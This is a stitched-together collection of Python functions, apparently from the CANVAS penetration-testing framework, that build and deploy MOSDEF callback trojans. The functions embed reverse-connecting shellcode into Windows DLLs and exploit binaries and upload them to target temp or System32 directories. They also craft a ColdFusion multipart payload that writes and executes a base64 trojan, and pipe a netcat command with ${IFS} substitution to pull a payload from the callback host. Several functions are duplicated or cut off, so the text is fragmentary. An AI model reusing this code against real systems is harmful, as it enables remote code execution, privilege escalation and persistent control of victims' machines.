def getPlatformInfo(self):
"""
Very weird Windows 7 issue:
http://www.techsupportforum.com/microsoft-support/windows-vista-windows-7-support/167785-running-cmd-exe.html
http://social.technet.microsoft.com/Forums/en-US/w7itprogeneral/thread/2d506b96-e856-4752-90af-4f8194bb0040
"""
if getattr(self, "failedDismallyAtPlatformInfo", False):
self.log("No platform info available")
return None
# What about windows? XXX: implement boot.ini grabbing.
#s = self.runcommand("cmd /c type %SYSTEMDRIVE%\\boot.ini")
s = self.runcommand("cmd /c type %SYSTEMDRIVE%\\autoexec.bat")
#this will work even when there is a cmd.exe in the path somewhere!
if s and "NTVDM" in s:
s = "Windows"
else:
s = self.runcommand("cmd /c ver")
if s and "Windows" in s:
s = "Windows"
else:
s = self.runcommand("ver.exe")
if s and "Windows" in s:
s = "Windows"
else:
s = self.runcommand("uname -a")
if len(s) == 0:
self.log("Failed to get PlatformInfo")
self.failedDismallyAtPlatformInfo = True
return None
self.log("Got platformInfo: %s" % s)
self.uname = s
os = canvasos()
os.load_uname(s)
ret = os
return ret
if s == "Windows":
os = canvasos()
os.load_uname({
"sysname": "Windows",
"release": None,
"machine": "x86"
})
return os
return None
def ncCallbackTrojan(self):
# wait for a nc callback and send down a trojan
trojancmd = "nc -n " + self.callback.ip + " " + str(
self.data_port) + " >/tmp/a"
payload = self.cmdExec.replace("THECMD",
trojancmd.replace(" ", "${IFS}"))
from libs.canvasos import canvasos
my_os = canvasos("Linux")
my_os.arch = "x86"
self.log("Building MOSDEF trojan for: %s %s" % (my_os, my_os.arch))
self.log("Callback set for: %s:%s" %
(self.callback.ip, self.callback.port))
try:
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=my_os,
universal=True)
except Exception, err:
self.log("Problem building the MOSDEF trojan: %s" % (err))
self.setInfo("%s - failed" % (NAME))
return 0
def getInfo(self):
os = canvasos("Windows")
#self.hostsknowledge.get_localhost().add_knowledge("OS", os, 100)
osinfo = self.shell.getOSInfo()
if osinfo != None:
if len(osinfo) > 1:
self.hostsknowledge.get_localhost().add_knowledge(
"OS Version", osinfo[1], 100)
if len(osinfo) > 2:
self.hostsknowledge.get_localhost().add_knowledge(
"OS Version Number", osinfo[2], 100)
if len(osinfo) > 0:
self.hostsknowledge.get_localhost().add_knowledge(
"OS Architecture", osinfo[0], 100)
if "32" in osinfo[0]:
os.arch = 'X86'
elif "64" in osinfo[0]:
os.arch = 'X64'
self.hostsknowledge.get_localhost().add_knowledge("OS", os, 100)
psver = self.shell.getPSVersion()
if psver != None:
self.hostsknowledge.get_localhost().add_knowledge(
"POWERSHELL Version", psver, 100)
return os
def build_universal_trojan(self, os_version="Linux", os_arch="X64"):
'''
Builds the callback.
os_version must be "Linux" or "WINDOWS"
os_arch must be "X86" or "X64"
'''
t_os = canvasos(os_version)
t_os.arch = os_arch
logging.info("Callback set to %s:%s" %
(self.callback.ip, self.callback.port))
try:
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True,
http=False,
ssl=False)
if ret:
if os_version == 'WINDOWS':
cb_name = "cb_%s.exe" % os_arch
else:
cb_name = "cb.linux.%s" % os_arch
filename = os.path.join(self.respath, cb_name)
with open(filename, "wb") as f:
f.write(self.mosdeftrojan)
self.payload_fname = filename
except Exception, err:
logging.error("Problem building MOSDEF trojan: %s" % str(err))
return False
def run(self):
self.get_args()
self.setInfo('OS Detecting -> %s' % self.host)
# main os base detection
os = self.os_detect(self.host, self.node)
# windows service pack detection ...
if os and os.base.lower() in ['windows'] and self.sp == True:
self.log('OS DETECT: running Service Pack detection ...')
self.incr_prog('ServicePack')
os = self.run_spdetect(os=os)
# windows language detection
if os and os.base.lower() in ['windows'
] and self.no_language_check != True:
self.log('OS DETECT: running Language detection ...')
self.incr_prog('Language')
os = self.run_languagedetect(os=os)
# can't determine target OS
if not os and self.known == False:
self.log('OS DETECT: Unable to determine OS ...')
self.setInfo('OS DETECT: Unable to determine OS ...')
self.target.add_knowledge('OS', canvasos.canvasos('Unknown'), 0)
self.setProgress(100.0)
return 0 # unable to determine ..
# only add when we dont know ...
if self.known == False:
self.target.add_knowledge('OS', os, 100)
self.setInfo("%s Found: %s->%s (Via: %s)" %
(NAME, self.host, str(os), ','.join(self.via)))
self.log("%s Found: %s->%s (Via: %s)" %
(NAME, self.host, str(os), ','.join(self.via)))
##Print out sexy dataview formatted code
self.do_data_view(col_title=["Host", "OS"],
data=[[self.host, str(os)]])
else:
# get known knowledge
ret = self.target.get_knowledge('OS')
if ret:
os = ret.known
self.setInfo("%s Found: %s->%s" % (NAME, self.host, str(os)))
self.log("%s Found: %s->%s" % (NAME, self.host, str(os)))
##Print out sexy dataview formatted code
self.do_data_view(col_title=["Host", "OS"],
data=[[self.host, str(os)]])
else:
self.setProgress(100.0)
return 0 # unable to determine ...
# self.result is used in autoversioning ..
self.result = os
self.setProgress(100.0)
return 1
def getPlatformInfo(self):
if getattr(self, "failedDismallyAtPlatformInfo", False):
return None
# What about windows? XXX: implement boot.ini grabbing.
s = self.runcommand("cmd /c type %SYSTEMDRIVE%\\boot.ini")
if len(s) == 0:
s = self.runcommand("cmd /c ver")
if len(s) == 0:
s = self.runcommand("uname -a")
if len(s) == 0:
self.log("Failed to get PlatformInfo")
self.failedDismallyAtPlatformInfo = True
return None
self.log("Got platformInfo: %s" % s)
self.uname = s
os = canvasos()
os.load_uname(s)
ret = os
return ret
def send_mosdef_trojan(self):
ret = True
try:
server = gettcplistener(self.tcp_port)
client, _ = server.accept()
data = client.recv(256)
arch = data.split('-')[0]
if arch.lower() == 'x86_64':
self.arch = 'X64'
elif arch.lower() == 'i386':
self.arch = 'X86'
else:
logging.info('OS not supported')
raise ValueError(arch)
t_os = canvasos("Linux")
t_os.arch = self.arch
self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True)
client.sendall(self.mosdeftrojan)
client.close()
server.close()
except Exception as e:
logging.error('Failed to detect architecture: %s' % str(e))
ret = False
return ret
def make_dll(self):
t_os = canvasos('WINDOWS')
t_os.arch = "x64" if (self.is_64bit_node()
or self.has_wow64()) else "x86"
if t_os.arch == "x64":
plds = payloads64(dll=True)
inner_pld = payloads64(module=self, dll=False)
assembly_inner = inner_pld.callback(self.callback.ip,
self.callback.port,
universal=True)
code_inner = inner_pld.assemble(assembly_inner)
assembly_outer = plds.wrap_payload(code_inner)
shellcode = plds.assemble(assembly_outer)
myPElib = PElib(win64=1)
trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
gui=False)
else:
plds = payloads(module=self, dll=True)
assembly_inner = plds.callback(self.callback.ip,
self.callback.port,
universal=True)
shellcode = plds.assemble(assembly_inner)
myPElib = PElib()
importante = myPElib.get_random_imports()
trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
gui=False,
importante=importante)
return trojan_dll
def write_file_remote(self, winver):
t_os = canvasos('WINDOWS')
t_os.arch = "x64" if (self.is_64bit_node()
or self.has_wow64()) else "x86"
xpl_orig_name = "exploit" + winver + "_x86.exe"
if t_os.arch == "x64":
xpl_orig_name = "exploit" + winver + "_x64.exe"
local_exploit_path = os.path.join(self.binaries_path, xpl_orig_name)
tmp_path = self.node.shell.GetTempPathA()
if not tmp_path:
logging.error("Could not resolve full temp directory path")
return False
else:
logging.info("Temp directory: %s" % tmp_path)
if self.node.shell.chdir(tmp_path) < 0:
logging.error("Could not chdir into %s" % tmp_path)
return False
remote_exploit_name = "%s.exe" % random.randint(10001, 99999)
remote_exploit_path = tmp_path + remote_exploit_name
if not self.nodeUpload(local_exploit_path, remote_exploit_path):
logging.error("Failed to upload the EXE")
return False
return remote_exploit_path
def make_CF_payload(self):
"""
Build our ColdFusion 'shell' that will dump our MOSDEF trojan to disk and execute it
"""
from libs.canvasos import canvasos
my_os = canvasos("Windows")
my_os.arch = "x86"
self.log("Creating a callback to %s:%s"%(self.callback.ip, self.callback.port))
if not self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=my_os, universal=True):
return False
base64data = base64.encodestring( self.mosdeftrojan )
self.payload = "--576a5sdf6\r\n"
self.payload += "Content-Disposition: form-data; name=\"NewFile\"; filename=\"%s\"\r\n"%self.filename
self.payload += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
self.payload += """
<cfset path = GetDirectoryFromPath( GetCurrentTemplatePath() ) >
<cfsavecontent variable="o">BASE64DATA</cfsavecontent>
<cfset d = toBinary(o)>
<cfset f = "TROJANFILENAME">
<cffile
action ="write"
file="#path#/#f#"
output=#d#>
<cfexecute name = "cmd" arguments = '/c #path##f#' timeout = "10"></cfexecute>\r\n"""
self.payload = self.payload.replace("BASE64DATA", base64data).replace("TROJANFILENAME",self.trojanfile)
self.payload += "--576a5sdf6--\r\n"
self.log("Created a payload using name: %s"%self.trojanfile)
return self.payload
def make_dll(self):
t_os = canvasos('WINDOWS')
t_os.arch = "x64" if (self.is_64bit_node()
or self.has_wow64()) else "x86"
if t_os.arch == "x64":
plds = payloads64(dll=True)
inner_pld = payloads64(module=self, dll=False)
assembly_inner = inner_pld.callback(self.callback.ip,
self.callback.port,
universal=True)
code_inner = inner_pld.assemble(assembly_inner)
assembly_outer = plds.wrap_payload(code_inner)
shellcode = plds.assemble(assembly_outer)
myPElib = PElib(win64=1)
trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
gui=False)
else:
trojan_dll = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True,
encrypted=False,
dll=True,
win8_compatible=True)
trojan_dll = self.mosdeftrojan
return trojan_dll
def get_os(self):
"""
Get the operating system (as a guess) from the
RPC information we just grabbed
Now a member function of canvasos object
"""
ret = canvasos("Unknown")
ret.guess_from_rpcdump(self.resultList)
return ret
def create_trojan(self):
t_os = canvasos('WINDOWS')
t_os.arch = 'X86'
trojan = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
t_os,
universal=True,
win8_compatible=True)
def bm_prepare_executables(self, tmp_directory):
c_string_padding = "A" * 300
exploit_name = "%s.exe" % random.randint(1001, 2000)
exploit_local_path = os.path.join(self.local_res,
"tmp_%s" % exploit_name)
exploit_rem_path = tmp_directory + exploit_name
mosdef_dll_name = "%s.exe" % random.randint(2001, 3000)
mosdef_local_path = os.path.join(self.local_res,
"tmp_%s" % mosdef_dll_name)
mosdef_rem_path = tmp_directory + mosdef_dll_name
return_value = [(exploit_local_path, exploit_rem_path),
(mosdef_local_path, mosdef_rem_path)]
exploit_orig_name = "bm_exploit32.exe"
if self.is_64bit_node() or self.has_wow64():
exploit_orig_name = "bm_exploit64.exe"
# Generate the MOSDEF executable
t_os = canvasos('WINDOWS')
t_os.arch = 'X64' if self.is_64bit_node() or self.has_wow64(
) else 'X86'
created_trojan = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
t_os,
universal=True)
if created_trojan != True:
self.log_error("Error in generating our MOSDEF executable")
return None
else:
logging.info("Writing MOSDEF callback to %s" % mosdef_local_path)
with open(mosdef_local_path, "wb") as handle:
handle.write(self.mosdeftrojan)
exploit_data = None
with open(os.path.join(self.local_res, exploit_orig_name),
"rb") as handle:
exploit_data = handle.read()
exploit_data = self.replace_unicode_string(
exploit_data, "MOSDEF_SHIM_DLL_PATH" + c_string_padding,
mosdef_rem_path)
logging.info("Writing exploit to %s" % exploit_local_path)
with open(exploit_local_path, "wb") as handle:
handle.write(exploit_data)
return return_value
def write_files_remote(self):
paths = {}
tmp_path = self.node.shell.GetTempPathA()
if not tmp_path:
logging.error("Could not resolve full temp directory path")
return None
else:
logging.info("Temp directory: %s" % tmp_path)
if self.node.shell.chdir(tmp_path) < 0:
logging.error("Could not chdir into %s" % tmp_path)
remote_exploit_name = "%s.exe" % random.randint(10001, 99999)
remote_exploit_path = tmp_path + remote_exploit_name
local_tmp_exploit_path = os.path.join(self.binaries_path, remote_exploit_name)
paths['local_tmp_exploit_path'] = local_tmp_exploit_path
paths['remote_exploit_name'] = remote_exploit_name
paths['remote_exploit_path'] = remote_exploit_path
trojan_dll = self.make_dll()
t_os = canvasos('WINDOWS')
t_os.arch = "x64" if (self.is_64bit_node() or self.has_wow64()) else "x86"
xpl_orig_name = "exploit_x86.exe"
if t_os.arch == "x64":
xpl_orig_name = "exploit_x64.exe"
local_exploit_path = os.path.join(self.binaries_path, xpl_orig_name)
with open(local_exploit_path, "rb") as f:
xpl_binary = f.read()
len_trojan_dll = len(trojan_dll)
if (len_trojan_dll > 20000):
logging.error("The trojan size is greater than the exploit buffer")
return None
pos = xpl_binary.find('NOX') + 4
xpl_binary.replace("NOX\0", struct.pack('<L', len_trojan_dll))
tmp_xpl = xpl_binary[:pos]
tmp_xpl += trojan_dll
tmp_xpl += xpl_binary[pos+len_trojan_dll:]
with open(local_tmp_exploit_path, "wb") as f:
f.write(tmp_xpl)
if not self.nodeUpload(local_tmp_exploit_path, remote_exploit_path):
logging.error("Error while uploading exploit binary")
return None
return paths
def build_mosdef_trojan(self):
ret = None
t_os = canvasos("Linux")
t_os.arch = 'X64' if self.arch == 'x86_64' else 'X86'
try:
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True)
except Exception, err:
logging.info("Error while building MOSDEF callback: %s" % str(err))
def getPlatformInfo(self):
s = self.runPhp("php_uname()")
self.log("Got platformInfo: %s" % s)
if len(s):
self.uname = s
os = canvasos()
os.load_uname(s)
ret = os
else:
ret = None
return ret
def prepare_artifacts(self, tmp_directory):
sct_name = "%s.sct" % str(random.randint(100001, 2000000))
sct_local_path = os.path.join(self.local_res, "tmp_%s" % sct_name)
sct_rem_path = tmp_directory + sct_name
mosdef_name = random_string(len("mosdefcallback")) + ".exe"
mosdef_local_path = os.path.join(self.local_res, "tmp_%s" % mosdef_name)
mosdef_rem_path = tmp_directory + mosdef_name
return_value = [(sct_local_path, sct_rem_path),
(mosdef_local_path, mosdef_rem_path)]
# Generate the MOSDEF executable
t_os = canvasos('WINDOWS')
t_os.arch = 'X64' if self.is_64bit_node() or self.has_wow64() else 'X86'
created_trojan = self.buildmosdeftrojan(self.callback.ip, self.callback.port, t_os, universal=True)
if created_trojan != True:
logging.error("Error in generating our MOSDEF executable")
return None
else:
logging.info("Writing MOSDEF callback to %s" % mosdef_local_path)
with open(mosdef_local_path, "wb") as handle:
handle.write(self.mosdeftrojan)
sct_data = None
with open(os.path.join(self.local_res, "template.sct"), "rb") as handle:
sct_data = handle.read()
sct_replacers = self.get_replacers(sct_data)
for replacer in sct_replacers:
if replacer == "{mosdefpath}":
sct_data = sct_data.replace(replacer, mosdef_rem_path.replace("\\", "\\\\"))
else:
replacer_string = random_string(random.randint(1, 8))
sct_data = sct_data.replace(replacer, replacer_string)
if replacer == "{randomtaskname}":
logging.info("Injected scheduled task name: %s" % replacer_string)
logging.info("Writing SCT file to %s" % sct_local_path)
logging.info("Writing callback file to %s" % mosdef_local_path)
with open(sct_local_path, "wb") as handle:
handle.write(sct_data)
return return_value
def makedownloadfile(self):
logging.debug('Creating mosdef payload')
logging.debug('\tIP: {}\tPort: {}'.format(self.callback.ip, self.callback.port))
t_os = canvasos("Linux")
t_os.arch = self.arch
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
universal=True)
return self.mosdeftrojan
def test(self):
"""
Quicky banner check - looks for comon basepaths
"""
self.getargs()
self.log("Using basepath=%s" % self.basepath)
#automatically check out some common basepaths, starting with the one specified
if not self.ssl:
#currently we only check the banner if we are not ssl
ret = self.bannerchecktest({"IIS/5.0": 1},
sendstr="HEAD / HTTP/1.0\r\n\r\n")
print "after bannerchecktest"
print ret
if not ret:
self.log("Failed to find IIS")
return 0
for basepath in [
self.basepath, "/scripts/", "/msadc/", "/_vti_bin/",
"/iisadmpwd/"
]:
self.log("Testing for basepath: %s" % basepath)
self.argsDict["basepath"] = basepath
self.basepath = basepath
self.outputdir = "winnt/system32/"
self.set_prefix()
#command="dir"
command = self.command
data = self.run_command(command)
#we don't get the header here (we use spkproxy.urlopen)
if type(data) == type("") and "<DIR>" in data:
#we don't look for "directory" or other
#english strings because that would
#be localization dependant
self.log("Found executable directory with prefix %s" %
self.prefix)
newos = canvasos()
newos.base = "Windows"
newos.version = "2000"
newos.arch = "x86"
self.target_os = newos
#we specifically CANT do debug.exe method
#in IIS
#self.capabilities+=["debug.exe"]
self.capabilities += ["tftp"]
self.version = 1
return ret
self.version = 0 #we failed
return 0
def make_dll_last_win(self):
t_os = canvasos('WINDOWS')
t_os.arch = "x64" if (self.is_64bit_node()
or self.has_wow64()) else "x86"
dll_name = ""
if t_os.arch == "x64":
dll_name = "dll_x64.dll"
plds = payloads64(
module=self,
dll=False) # False-> terminate thread // True -> ret
else:
dll_name = "dll_x86.dll"
plds = payloads(module=self, dll=False)
assembly_inner = plds.callback(self.callback.ip,
self.callback.port,
universal=True)
code_inner = plds.assemble(assembly_inner)
code_len = len(code_inner)
local_dll_path = os.path.join(self.binaries_path, dll_name)
with open(local_dll_path, 'rb') as f:
local_dll_binary = f.read()
pos = local_dll_binary.find("NOX")
tmp_dll_binary = local_dll_binary[:pos]
tmp_dll_binary += code_inner
tmp_dll_binary += local_dll_binary[pos + len(code_inner):]
tmp_dll_name = "%s.dll" % random.randint(10001, 99999)
tmp_dll_path = os.path.join(self.binaries_path, tmp_dll_name)
logging.info(tmp_dll_path)
with open(tmp_dll_path, 'wb') as f:
f.write(tmp_dll_binary)
windir = self.node.shell.GetEnvironmentVariable('SystemRoot')
if self.has_wow64():
remote_dll_path = windir + "\\Sysnative\\windowscoredeviceinfo.dll"
else:
remote_dll_path = windir + "\\System32\\windowscoredeviceinfo.dll"
if not self.nodeUpload(tmp_dll_path, remote_dll_path):
os.unlink(tmp_dll_path)
return False
os.unlink(tmp_dll_path)
return True
def getInfo(self):
s = self.sysinfo(val="ALL")
self.log("Got sysinfo: %s" % s)
if len(s):
self.uname = s
os = canvasos()
os.load_uname(s)
ret = os
self.hostsknowledge.get_localhost().add_knowledge("OS", os, 100)
else:
ret = None
return ret
def maketrojan(self):
from libs.canvasos import canvasos
my_os = canvasos("Linux")
my_os.arch = 'X86'
self.log("[D2] Creating a callback to %s:%s" %
(self.callback.ip, self.callback.port))
if not self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=my_os,
universal=True):
return 0
file(self.trojanname, "wb").write(self.mosdeftrojan)
ret = len(self.mosdeftrojan) != 0
return ret
def maketrojan(self):
from libs.canvasos import canvasos
my_os = canvasos(targets[self.version])
my_os.arch = 'X86'
self.log("Creating a callback to %s:%s"%(self.callback.ip, self.callback.port))
if not self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=my_os, universal=True):
return 0
if self.version == 0:
self.htafile = self.file4hta(self.mosdeftrojan)
file(self.trojanname, "wb").write(self.htafile)
self.setInfo("%s - done"%(NAME))
else:
file(self.trojanname, "wb").write(self.mosdeftrojan)
ret = len(self.mosdeftrojan) != 0
return ret
def create_callback(self):
t_os = canvasos('WINDOWS')
t_os.arch = 'X64' if self.is_64bit_node() or self.has_wow64(
) else 'X86'
logging.info("Building callback to ip:%s, port:%d, architecture:%s" %
(self.callback.ip, self.callback.port, t_os.arch))
self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
t_os,
universal=True)
callback_path = os.path.join(
self.output(ip=self.node.get_interesting_interface(),
subdir="tpminit_wbemcomn"),
self.filename_generator(len("trojan")) + ".exe")
with open(callback_path, "wb") as handle:
handle.write(self.mosdeftrojan)
return callback_path
def create_trojan(self):
t_os = canvasos('WINDOWS')
if self.x64:
t_os.arch = 'X64'
else:
t_os.arch = 'X86'
trojan = self.buildmosdeftrojan(self.callback.ip, self.callback.port, t_os, universal=True, win8_compatible=True)
if trojan != True:
logging.error('Building mosdef trojan failed')
return 0
# Write the trojan to the fs
fd = open(self.trojan_name, "wb")
fd.write(self.mosdeftrojan)
fd.close()
return self.mosdeftrojan
def getShellcode(self):
self.callback.ip = self.callback_host
self.callback.port = int(self.callback_port)
t_os = canvasos("Linux")
t_os.arch = self.arch
logging.info("Building Linux MOSDEF trojan - %s:%s" %
(self.callback.ip, str(self.callback.port)))
try:
self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=t_os,
http=self.mosdef_http,
ssl=self.mosdef_ssl,
universal=self.mosdef_universal,
encrypted=self.mosdef_encrypted)
except Exception, err:
traceback.print_exc()
logging.error("Problem building the MOSDEF trojan: %s" % (err))
return None
def set_up_smb_server(self):
self.log("WP> Starting SMB Server on 0.0.0.0:445")
mysmb = SMBServer('0.0.0.0', 445)
mysmb.timeout = 30
my_os = canvasos("Windows")
my_os.arch = "x86"
try:
ret = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
target_os=my_os,
http=False,
ssl=False,
universal=True)
except Exception, err:
self.log("WP> Problem building MOSDEF PE Trojan: %s" % (err))
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
def create_callback(self):
t_os = canvasos('WINDOWS')
t_os.arch = 'X64' if self.is_64bit_node() or self.has_wow64(
) else 'X86'
logging.info("Building callback to ip:%s, port:%d, architecture:%s" %
(self.callback.ip, self.callback.port, t_os.arch))
self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
t_os,
universal=True)
callback_path = os.path.join(
self.output(ip=self.node.get_interesting_interface(),
subdir="sdclt_uac_bypass"),
"%d.exe" % random.randint(0, 100000000))
with open(callback_path, "wb") as handle:
handle.write(self.mosdeftrojan)
return callback_path
def run(self):
self.setInfo("%s" % (NAME))
node = self.argsDict["passednodes"][0]
self.node = node
ret = 0
#If we are patched we dont want to run
lib = {}
lib['c:\\windows\\system32\\rtutils.dll'] = '6.1.7600.16617'
if not self.check_if_vulnerable(lib):
ret = 0
if "win32api" in node.capabilities:
shell = node.shell
if not self.callback:
#usually the engine takes care of this
self.log("Need a callback for this exploit!")
ret = 0
ret, nodeos = node.shell.GetVersionEx()
minor = nodeos['Minor Version']
major = nodeos['Major Version']
if major != 6:
self.log(
'Windows %d.%d not supported, expecting 6.1 Win2k8/Win7' %
(major, minor))
ret = 0
self.log('Attacking Windows %d.%d' % (major, minor))
#Upload a new mosdef file.
t_os = canvasos('WINDOWS')
t_os.arch = 'X86'
trojan = self.buildmosdeftrojan(self.callback.ip,
self.callback.port,
t_os,
universal=True)
if trojan != True:
self.log('building mosdef trojan failed')
ret = 0
#use pelib to build the universal callback shellcode into a trojan .exe
fi = 'a%d.exe' % (random.randint(0, 1000))
f = open(fi, 'w')
f.write(self.mosdeftrojan)
f.close()
remote_filename_exe = 'tempfile%d.exe' % random.randint(0, 1000)
try:
ret = self.node.shell.upload(source=fi,
destfilename=remote_filename_exe)
except canvaserror.NodeCommandError, message:
self.log("Could not upload files!, changing dir.")
tempdir = node.shell.GetEnvironmentVariable("TEMP")
self.log("Chdiring into %s on node %s" %
(tempdir, node.getname()))
chdir_ret = node.shell.chdir(tempdir)
if chdir_ret != -1:
#success!
self.log(
"Running attack in the tempdir to see if that helps")
ret = self.node.shell.upload(
source=fi, destfilename=remote_filename_exe)
self.log("Attack returned: %s" % ret)
else:
self.log("Could not chdir into %s - bailing out" % tempdir)
self.setInfo(
"%s: Could not find writable directory (failed)" %
NAME)
ret = 0
os.remove(fi)
vars = {}
code = self.makecode(remote_filename_exe)
try:
shell.clearfunctioncache()
request = shell.compile(code, vars)
shell.sendrequest(request)
#return from CreateProcessAsUser
return_value = shell.readint()
#if it fails, should send GetLastError
if return_value == 0:
err = shell.readint()
shell.leave()
if err == 0xfffffff:
self.log('Couldnt write in registry')
elif err == 0xffffffe:
self.log('The exploit timed out')
else:
self.log('Error from GetLastError: 0x%x' % (err))
#remove unused file if exploit fails
ret = self.node.shell.unlink(remote_filename_exe)
self.log('Removing remote file returned: %s' % (ret))
ret = 0
else:
self.log('New impersonated process was created')
self.log("You should see another node appearing now")
shell.leave()
if self.ISucceeded():
ret = 1
else:
ret = 0
except Exception as e:
self.node.shell.unlink(remote_filename_exe)
ret = 0